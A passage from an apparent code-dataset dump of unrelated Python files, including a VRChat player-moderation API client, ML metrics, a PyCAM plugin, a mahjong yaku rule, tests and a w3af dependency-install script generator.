should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.clear_all_player_moderations_endpoint.call_with_http_info(**kwargs)
def delete_player_moderation(
self,
player_moderation_id,
**kwargs
):
"""Delete Player Moderation # noqa: E501
Deletes a specific player moderation based on its `pmod_` ID. The website uses `unmoderateUser` instead. You can delete the same player moderation multiple times successfully. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_player_moderation(player_moderation_id, async_req=True)
>>> result = thread.get()
Args:
player_moderation_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['player_moderation_id'] = \
player_moderation_id
return self.delete_player_moderation_endpoint.call_with_http_info(**kwargs)
def get_player_moderation(
self,
player_moderation_id,
**kwargs
):
"""Get Player Moderation # noqa: E501
Returns a single Player Moderation. This returns the exact same amount of information as the more generalised `getPlayerModerations`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_player_moderation(player_moderation_id, async_req=True)
>>> result = thread.get()
Args:
player_moderation_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PlayerModeration
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['player_moderation_id'] = \
player_moderation_id
return self.get_player_moderation_endpoint.call_with_http_info(**kwargs)
def get_player_moderations(
self,
**kwargs
):
"""Search Player Moderations # noqa: E501
Returns a list of all player moderations made by **you**. This endpoint does not have pagination, and will return *all* results. Use query parameters to limit your query if needed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_player_moderations(async_req=True)
>>> result = thread.get()
Keyword Args:
type (str): Must be one of PlayerModerationType, except unblock. Unblocking simply removes a block. [optional]
target_user_id (str): Must be a valid UserID. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[PlayerModeration]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_player_moderations_endpoint.call_with_http_info(**kwargs)
def moderate_user(
self,
**kwargs
):
"""Moderate User # noqa: E501
Moderate a user, e.g. unmute them or show their avatar. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.moderate_user(async_req=True)
>>> result = thread.get()
Keyword Args:
moderate_user_request (ModerateUserRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PlayerModeration
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.moderate_user_endpoint.call_with_http_info(**kwargs)
def unmoderate_user(
self,
**kwargs
):
"""Unmoderate User # noqa: E501
Removes a player moderation previously added through `moderateUser`. E.g. if you have previously shown their avatar but now want to reset it to the default. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unmoderate_user(async_req=True)
>>> result = thread.get()
Keyword Args:
moderate_user_request (ModerateUserRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.unmoderate_user_endpoint.call_with_http_info(**kwargs)
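# Hypothetical usage sketch: in a real program the ApiClient would be built from
# an authenticated vrchatapi Configuration; the call below only uses keyword
# arguments documented in the docstrings above.
if __name__ == "__main__":
    client = ApiClient()  # placeholder; normally carries the auth cookies
    moderations_api = PlayermoderationApi(client)
    for moderation in moderations_api.get_player_moderations():
        print(moderation)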
| StarcoderdataPython |
1715640 | # Important Imports
import numpy as np
from PIL import Image
from scipy.signal import find_peaks
# image = PIL.Image, n = Number of Segments
# ignoreBottomTop = skip the first and last detected peaks (top/bottom of the image)
# axis = 0 (for vertical-lines) or 1 (for horizontal-lines)
# Returns a gray image, PIL Image.
def recursiveXYCut(image, n, ignoreBottomTop = True, axis = 1):
image = image.convert('L')
image_arr = np.asarray(image)
# distance for peaks
distance = image_arr.shape[0 if axis == 1 else 1]/n
# Sum the pixels along given axis
sum_vals = image_arr.sum(axis = axis)
# Get the indices of the peaks
peaks, _ = find_peaks(sum_vals, distance=distance)
# Temp variable to create segment lines i.e. 0 out the required values.
temp = np.ones(image_arr.shape)
# Skip top and bottom segmentation or not (depends on the param)
#for peak in peaks[1:-1 if ignoreBottomTop else ]:
for peak in peaks[1:-1] if ignoreBottomTop else peaks:
if axis == 1:
temp[range(peak-2, peak+2)] = 0
else:
temp[:, range(peak-2, peak+2)] = 0
return Image.fromarray(np.uint8(image_arr * temp))
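# Hypothetical usage sketch ('page.png' is a placeholder path): draw roughly
# five horizontal cut lines across a scanned page and save the result.
if __name__ == '__main__':
    page = Image.open('page.png')
    segmented = recursiveXYCut(page, n=5, ignoreBottomTop=True, axis=1)
    segmented.save('page_segmented.png')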
| StarcoderdataPython |
47076 | <filename>ptt/page.py
import re
from .type import Url
from typing import Iterator, List
import urllib.parse as urlpasre
from abc import ABC, abstractmethod
class PageManager(ABC):
def __init__(self, start_url: Url) -> None:
self.start_url = start_url
@abstractmethod
def get_urls(self, search_page_num: int, **kwargs) -> Iterator[Url]:
pass
class DefaultPage(PageManager):
def set_page_indx(self, indx: int) -> None:
self._page_indx = indx
def get_page_indx(self) -> int:
return self._page_indx
def get_url(self, indx: int) -> Url:
url = re.sub(r'index.html', f'index{indx}.html', self.start_url)
return Url(url)
def get_urls(
self,
search_page_num: int,
**kwargs
) -> Iterator[Url]:
first_indx = self.get_page_indx()
for indx in range(first_indx, first_indx-search_page_num, -1):
yield self.get_url(indx)
class SearchPage(PageManager):
def get_url(self, indx: int, **kwargs) -> Url:
body_list: List[str] = []
for key in kwargs:
if key == 'author':
body_list.append(f"author:{kwargs[key]}")
elif key == 'keyword':
body_list.append(kwargs[key])
elif key == 'recommend':
# Search string order affects the search results
body_list.insert(0, f"recommend:{kwargs[key]}")
search_url = urlpasre.urljoin(self.start_url, 'search')
url_parse = urlpasre.urlparse(search_url)
url_query = urlpasre.urlencode({
'page': str(indx),
'q': "\\+".join(body_list)
})
url = url_parse._replace(query=url_query).geturl()
return Url(url.replace('%5C%2B', '+'))
def get_urls(
self,
search_page_num: int,
**kwargs
) -> Iterator[Url]:
for indx in range(1, search_page_num+1):
yield self.get_url(indx, **kwargs)
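# Hypothetical usage sketch (run e.g. via `python -m ptt.page`; the board URL
# and query values are placeholders):
if __name__ == '__main__':
    search = SearchPage(Url('https://www.ptt.cc/bbs/Gossiping/index.html'))
    for url in search.get_urls(3, keyword='python', recommend=50):
        print(url)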
| StarcoderdataPython |
105873 | <reponame>xiaolao/PaddleX
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from sklearn.metrics import hamming_loss
from sklearn.metrics import accuracy_score as accuracy_metric
from sklearn.metrics import multilabel_confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import average_precision_score
from sklearn.preprocessing import binarize
import numpy as np
__all__ = [
"multi_hot_encode", "hamming_distance", "accuracy_score",
"precision_recall_fscore", "mean_average_precision"
]
def multi_hot_encode(logits, threshold=0.5):
"""
Encode logits into multi-hot vectors by element-wise thresholding (multilabel)
"""
return binarize(logits, threshold=threshold)
def hamming_distance(output, target):
"""
Soft metric based label for multilabel classification
Returns:
The smaller the return value is, the better model is.
"""
return hamming_loss(target, output)
def accuracy_score(output, target, base="sample"):
"""
Hard metric for multilabel classification
Args:
output:
target:
base: ["sample", "label"], default="sample"
if "sample", return metric score based sample,
if "label", return metric score based label.
Returns:
accuracy:
"""
assert base in ["sample", "label"], 'must be one of ["sample", "label"]'
if base == "sample":
accuracy = accuracy_metric(target, output)
elif base == "label":
mcm = multilabel_confusion_matrix(target, output)
tns = mcm[:, 0, 0]
fns = mcm[:, 1, 0]
tps = mcm[:, 1, 1]
fps = mcm[:, 0, 1]
accuracy = (sum(tps) + sum(tns)) / (
sum(tps) + sum(tns) + sum(fns) + sum(fps))
return accuracy
def precision_recall_fscore(output, target):
"""
Per-label precision, recall and F-score for multilabel classification
Returns:
precisions:
recalls:
fscores:
"""
precisions, recalls, fscores, _ = precision_recall_fscore_support(target,
output)
return precisions, recalls, fscores
def mean_average_precision(logits, target):
"""
Calculate mean average precision (mAP) over labels
Args:
logits: raw scores from the network (before sigmoid or softmax)
target: ground truth, 0 or 1
"""
if not (isinstance(logits, np.ndarray) and isinstance(target, np.ndarray)):
raise TypeError("logits and target should be np.ndarray.")
aps = []
for i in range(target.shape[1]):
ap = average_precision_score(target[:, i], logits[:, i])
aps.append(ap)
return np.mean(aps)
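# Illustrative usage with tiny made-up arrays (3 samples, 4 labels), just to
# show how the helpers above fit together.
if __name__ == "__main__":
    logits = np.array([[0.9, 0.2, 0.7, 0.1],
                       [0.3, 0.8, 0.6, 0.4],
                       [0.1, 0.1, 0.9, 0.7]])
    target = np.array([[1, 0, 1, 0],
                       [0, 1, 1, 0],
                       [0, 0, 1, 1]])
    output = multi_hot_encode(logits, threshold=0.5)
    print("hamming distance:", hamming_distance(output, target))
    print("accuracy (sample):", accuracy_score(output, target, base="sample"))
    print("precision/recall/fscore:", precision_recall_fscore(output, target))
    print("mAP:", mean_average_precision(logits, target))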
| StarcoderdataPython |
3293913 | import torch
import torch.nn as nn
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class BaseModel(torch.nn.Module):
def load(self, path):
"""Load model from file.
Args:
path (str): file path
"""
parameters = torch.load(path, map_location=device)
if "optimizer" in parameters:
parameters = parameters["model"]
self.load_state_dict(parameters)
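# Hypothetical usage sketch: TinyModel and 'weights.pt' are placeholders, only
# meant to show how a subclass picks up BaseModel.load().
class TinyModel(BaseModel):
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(8, 2)
    def forward(self, x):
        return self.linear(x)
# model = TinyModel()
# model.load("weights.pt")  # accepts a plain state dict or {"optimizer": ..., "model": ...}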
| StarcoderdataPython |
50871 | """
Copyright 2011 <NAME> <<EMAIL>>
This file is part of PyCAM.
PyCAM is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PyCAM is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PyCAM. If not, see <http://www.gnu.org/licenses/>.
"""
import pycam.Geometry.Model
import pycam.Plugins
import pycam.workspace.data_models
class ModelSupport(pycam.Plugins.PluginBase):
UI_FILE = "model_support.ui"
DEPENDS = ["Models"]
CATEGORIES = ["Model", "Support bridges"]
MODEL_NAME_TEMPLATE = "Support Model #%d"
def setup(self):
if self.gui:
self._support_frame = self.gui.get_object("ModelExtensionsFrame")
self._support_frame.unparent()
self.core.register_ui("model_handling", "Support", self._support_frame, 0)
support_model_type_selector = self.gui.get_object("SupportGridTypesControl")
self._gtk_handlers = []
self._gtk_handlers.append((support_model_type_selector, "changed",
"support-model-changed"))
def add_support_model_type(obj, name):
types_model = support_model_type_selector.get_model()
# the model is gone (for unknown reasons) when the GTK loop stops
if types_model is not None:
types_model.append((obj, name))
# enable the first item by default
if len(types_model) == 1:
support_model_type_selector.set_active(0)
def clear_support_model_type_selector():
model = support_model_type_selector.get_model()
# the model is gone (for unknown reasons) when the GTK loop stops
if model is not None:
model.clear()
def clear_support_model_settings():
children = container.get_children()
for child in children:
container.remove(child)
def get_support_model_type():
index = support_model_type_selector.get_active()
if index < 0:
return None
else:
selector_model = support_model_type_selector.get_model()
return selector_model[index][0]
def set_support_model_type(model_type):
selector_model = support_model_type_selector.get_model()
for index, row in enumerate(selector_model):
if row[0] == model_type:
support_model_type_selector.set_active(index)
break
else:
support_model_type_selector.set_active(-1)
self.core.register_ui_section("support_model_type_selector", add_support_model_type,
clear_support_model_type_selector)
self.core.register_ui("support_model_type_selector", "none", "none", weight=-100)
container = self.gui.get_object("SupportAddOnContainer")
self.core.register_ui_section(
"support_model_settings",
lambda obj, name: container.pack_start(obj, expand=False, fill=False, padding=0),
clear_support_model_settings)
# TODO: remove public settings
self.core.add_item("support_model_type", get_support_model_type,
set_support_model_type)
grid_thickness = self.gui.get_object("SupportGridThickness")
self._gtk_handlers.append((grid_thickness, "value-changed", "support-model-changed"))
self.core.add_item("support_grid_thickness", grid_thickness.get_value,
grid_thickness.set_value)
grid_height = self.gui.get_object("SupportGridHeight")
self._gtk_handlers.append((grid_height, "value-changed", "support-model-changed"))
self.core.add_item("support_grid_height", grid_height.get_value, grid_height.set_value)
self._gtk_handlers.append((self.gui.get_object("CreateSupportModel"), "clicked",
self._add_support_model))
# support grid defaults
self.core.set("support_grid_thickness", 0.5)
self.core.set("support_grid_height", 0.5)
self.core.set("support_grid_type", "none")
self.core.register_chain("get_draw_dimension", self.get_draw_dimension)
# handlers
self._event_handlers = (
("model-change-after", "support-model-changed"),
("bounds-changed", "support-model-changed"),
("model-selection-changed", "support-model-changed"),
("support-model-changed", self.update_support_model))
self.register_gtk_handlers(self._gtk_handlers)
self.register_event_handlers(self._event_handlers)
self._update_widgets()
return True
def teardown(self):
if self.gui:
self.unregister_event_handlers(self._event_handlers)
self.unregister_gtk_handlers(self._gtk_handlers)
self.core.unregister_chain("get_draw_dimension", self.get_draw_dimension)
self.core.unregister_ui("model_handling", self.gui.get_object("ModelExtensionsFrame"))
self.core.unregister_ui("support_model_type_selector", "none")
self.core.unregister_ui_section("support_model_settings")
self.core.unregister_ui_section("support_model_type_selector")
def _update_widgets(self):
models = self.core.get("models").get_selected()
if models:
self._support_frame.show()
else:
self._support_frame.hide()
grid_type = self.core.get("support_model_type")
details_box = self.gui.get_object("SupportGridDetailsBox")
# show/hide the common details (width/height)
# enable/disable the "create support model" button
create_button = self.gui.get_object("CreateSupportModel")
if grid_type == "none":
details_box.hide()
create_button.set_sensitive(False)
else:
details_box.show()
create_button.set_sensitive(True)
def _add_support_model(self, widget=None):
for model_object in self.core.get("current_support_models"):
self.core.get("models").add_model(model_object.get_dict(),
name_template=self.MODEL_NAME_TEMPLATE,
color=self.core.get("color_support_preview"))
# Disable the support model type -> avoid confusing visualization.
# (this essentially removes the support grid from the 3D view)
self.gui.get_object("SupportGridTypesControl").set_active(0)
def get_draw_dimension(self, low, high):
if not self.core.get("show_support_preview"):
return
support_model_objects = self.core.get("current_support_models", [])
support_models = []
for model_object in support_model_objects:
support_model = model_object.get_model()
if support_model:
support_models.append(support_model)
model_box = pycam.Geometry.Model.get_combined_bounds(support_models)
if model_box is None:
return
for index, (mlow, mhigh) in enumerate(zip(model_box.lower, model_box.upper)):
if (low[index] is None) or (mlow < low[index]):
low[index] = mlow
if (high[index] is None) or (mhigh > high[index]):
high[index] = mhigh
def update_support_model(self, widget=None):
old_support_model_objects = self.core.get("current_support_models")
selected_models = self.core.get("models").get_selected()
grid_type = self.core.get("support_model_type")
new_support_model_objects = []
if (grid_type == "none") or (not selected_models):
new_support_model_objects = []
else:
# update the support model
self.core.call_chain("get_support_models", selected_models, new_support_model_objects)
if old_support_model_objects != new_support_model_objects:
self.core.set("current_support_models", new_support_model_objects)
self.core.emit_event("visual-item-updated")
# show/hide controls
self._update_widgets()
| StarcoderdataPython |
3299075 | # -*- coding: utf-8 -*-
from mahjong.constants import CHUN, HAKU, HATSU
from mahjong.hand_calculating.yaku import Yaku
from mahjong.utils import is_pon, is_pair
class Shosangen(Yaku):
"""
Hand with two dragon pon sets and one dragon pair
"""
def __init__(self, yaku_id):
super(Shosangen, self).__init__(yaku_id)
def set_attributes(self):
self.tenhou_id = 30
self.name = '<NAME>'
self.english = 'Small Three Dragons'
self.han_open = 2
self.han_closed = 2
self.is_yakuman = False
def is_condition_met(self, hand, *args):
dragons = [CHUN, HAKU, HATSU]
count_of_conditions = 0
for item in hand:
# dragon pon or pair
if (is_pair(item) or is_pon(item)) and item[0] in dragons:
count_of_conditions += 1
return count_of_conditions == 3
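# Illustrative check (assumes hands divided into sets of 34-format tile indices,
# as elsewhere in the mahjong library; the two non-dragon sets are arbitrary and
# the yaku_id value is a placeholder):
if __name__ == '__main__':
    shosangen = Shosangen(yaku_id=0)
    hand = [[0, 1, 2], [5, 5, 5], [HAKU] * 3, [HATSU] * 3, [CHUN, CHUN]]
    print(shosangen.is_condition_met(hand))  # True: two dragon pons plus a dragon pair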
| StarcoderdataPython |
3204055 | <filename>opencadd/tests/structure/test_pocket_base.py
"""
Tests for opencadd.structure.pocket.core
"""
import pytest
from opencadd.structure.pocket import PocketBase
class TestPocketBase:
"""
Test PocketBase class methods.
"""
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_ids_formatted, residue_ixs_formatted",
[
([1, 2, 3], None, [1, 2, 3], [None, None, None]),
(["1", "2", "_", "_"], ["1", "2", "3", "4"], [1, 2, None, None], [1, 2, 3, 4]),
(["1", "2", None, None], ["1", "2", "3", "4"], [1, 2, None, None], [1, 2, 3, 4]),
],
)
def test_format_residue_ids_and_ixs(
self, residue_ids, residue_ixs, residue_ids_formatted, residue_ixs_formatted
):
"""
Test formatting of user-input residue PDB IDs and residue indices.
"""
base_pocket = PocketBase()
residue_ids2, residue_ixs2 = base_pocket._format_residue_ids_and_ixs(
residue_ids, residue_ixs, ""
)
assert residue_ids2 == residue_ids_formatted
assert residue_ixs2 == residue_ixs_formatted
@pytest.mark.parametrize(
"residue_ids, residue_ixs",
[
([1, 2, 3], [None, 2, 3]), # Non-int-castable index (None)
([1, 2, 3], ["a", 2, 3]), # Non-int-castable index
([1, 1, 2], None), # Duplicated PDB IDs
([1, 2, 3], [1, 1, 2]), # Duplicated indices
],
)
def test_format_residue_ids_and_ixs_raises(self, residue_ids, residue_ixs):
"""
Test error handling when formatting user-input residue PDB IDs and
residue indices.
"""
with pytest.raises((ValueError, TypeError)):
base_pocket = PocketBase()
base_pocket._format_residue_ids_and_ixs(residue_ids, residue_ixs, "")
@pytest.mark.parametrize(
"residue_ids, residue_ixs, n_residues",
[
([101, None], [1, 2], 2),
([101, None], [1, 2], 2),
([101, None], [None, None], 2),
],
)
def test_residues(self, residue_ids, residue_ixs, n_residues):
"""
Test property residues.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket.residues.columns.to_list() == ["residue.id", "residue.ix"]
assert (
base_pocket.residues.index.to_list()
== base_pocket.residues.reset_index().index.to_list()
)
assert base_pocket.residues.dtypes.to_list() == ["Int32", "Int32"]
assert len(base_pocket.residues) == n_residues
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_id, residue_ix",
[
([101, None], [1, 2], 101, 1), # Residue ID+index exist
([101, None], [1, 2], 102, None), # Residue ID does not exist
([101, None], [None, None], 101, None), # Residue ID maps to None
],
)
def test_residue_id2ix(self, residue_ids, residue_ixs, residue_id, residue_ix):
"""
Test residue PDB ID to index mapping.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket._residue_id2ix(residue_id) == residue_ix
@pytest.mark.parametrize(
"residue_ids, residue_ixs, residue_ix, residue_id",
[
([101, None], [1, 2], 1, 101), # Residue index+ID exist
([101, None], [1, 2], 2, None), # Residue index maps to None
([101, 102], [1, 2], 10, None), # Residue index does not exist
],
)
def test_residue_ix2id(self, residue_ids, residue_ixs, residue_ix, residue_id):
"""
Test residue index to PDB ID mapping.
"""
base_pocket = PocketBase()
base_pocket._residue_ids = residue_ids
base_pocket._residue_ixs = residue_ixs
assert base_pocket._residue_ix2id(residue_ix) == residue_id
| StarcoderdataPython |
162789 | <reponame>sayantansatpati/disdat<filename>tests/functional/test_tags.py
import uuid
import pytest
from disdat import api, common
from disdat.pipe import PipeTask
TAGS = {'tag1': 'omg', 'tag2': 'it works'}
class Source(PipeTask):
def pipe_requires(self):
self.set_bundle_name('tagged')
def pipe_run(self):
self.add_tags(TAGS)
return 0
class Destination(PipeTask):
def pipe_requires(self):
self.set_bundle_name('output')
self.add_dependency('tagged', Source, params={})
def pipe_run(self, tagged):
tags = self.get_tags('tagged')
assert tags is not TAGS
assert tags == TAGS
return 1
@pytest.fixture
def context():
try:
print('ensuring disdat is initialized')
common.DisdatConfig.init()
except:
print('disdat already initialized, no worries...')
print('creating temporary local context')
context = uuid.uuid1().hex
api.context(context)
yield context
print('deleting temporary local context')
api.delete_context(context)
class TestContext:
def test_tags(self, context):
api.apply(context, Destination)
if __name__ == '__main__':
pytest.main([__file__])
| StarcoderdataPython |
3308813 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('filmfestival', '0011_auto_20150610_1401'),
]
operations = [
migrations.AddField(
model_name='day',
name='runtime',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='screening',
name='time',
field=models.TimeField(default=datetime.datetime(2015, 6, 10, 14, 54, 35, 375260)),
preserve_default=False,
),
]
| StarcoderdataPython |
1711505 | import numpy as np
from sklearn.preprocessing import normalize
from utils.data_utils import convert_dir_vec_to_pose, dir_vec_pairs
def convert_pose_to_line_segments(pose):
line_segments = np.zeros((len(dir_vec_pairs) * 2, 3))
for j, pair in enumerate(dir_vec_pairs):
line_segments[2 * j] = pose[pair[0]]
line_segments[2 * j + 1] = pose[pair[1]]
line_segments[:, [1, 2]] = line_segments[:, [2, 1]] # swap y, z
line_segments[:, 2] = -line_segments[:, 2]
return line_segments
def convert_dir_vec_to_line_segments(dir_vec):
joint_pos = convert_dir_vec_to_pose(dir_vec)
line_segments = np.zeros((len(dir_vec_pairs) * 2, 3))
for j, pair in enumerate(dir_vec_pairs):
line_segments[2 * j] = joint_pos[pair[0]]
line_segments[2 * j + 1] = joint_pos[pair[1]]
line_segments[:, [1, 2]] = line_segments[:, [2, 1]] # swap y, z
line_segments[:, 2] = -line_segments[:, 2]
return line_segments
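# Minimal usage sketch. It assumes each entry of `dir_vec_pairs` (from utils.data_utils) starts
# with two joint indices, as the functions above rely on; the random pose below is illustrative only.
if __name__ == "__main__":
    num_joints = max(max(pair[0], pair[1]) for pair in dir_vec_pairs) + 1
    dummy_pose = np.random.rand(num_joints, 3)
    segments = convert_pose_to_line_segments(dummy_pose)
    print(segments.shape)  # (len(dir_vec_pairs) * 2, 3)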
| StarcoderdataPython |
3248621 | """
helper_script.py
Copyright 2013 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import tempfile
from .utils import running_in_virtualenv
SCRIPT_NAME = 'w3af_dependency_install.sh'
def generate_helper_script(pkg_manager_cmd, os_packages, pip_cmd, failed_deps,
external_commands):
"""
Generates a helper script to be run by the user to install all the
dependencies.
:return: The path to the script name.
"""
temp_dir = tempfile.gettempdir()
script_path = os.path.join(temp_dir, SCRIPT_NAME)
script_file = file(script_path, 'w')
script_file.write('#!/bin/bash\n')
#
# Report the missing system packages
#
if os_packages:
missing_pkgs = ' '.join(os_packages)
script_file.write('%s %s\n' % (pkg_manager_cmd, missing_pkgs))
#
# Report all missing python modules
#
if failed_deps:
script_file.write('\n')
if running_in_virtualenv():
script_file.write('# Run without sudo to install inside venv\n')
not_git_pkgs = [fdep for fdep in failed_deps if not fdep.is_git]
git_pkgs = [fdep.git_src for fdep in failed_deps if fdep.is_git]
if not_git_pkgs:
cmd = generate_pip_install_non_git(pip_cmd, not_git_pkgs)
script_file.write('%s\n' % cmd)
if git_pkgs:
for missing_git_pkg in git_pkgs:
cmd = generate_pip_install_git(pip_cmd, missing_git_pkg)
script_file.write('%s\n' % cmd)
for cmd in external_commands:
script_file.write('%s\n' % cmd)
# Make it executable
os.chmod(script_path, 0755)
script_file.close()
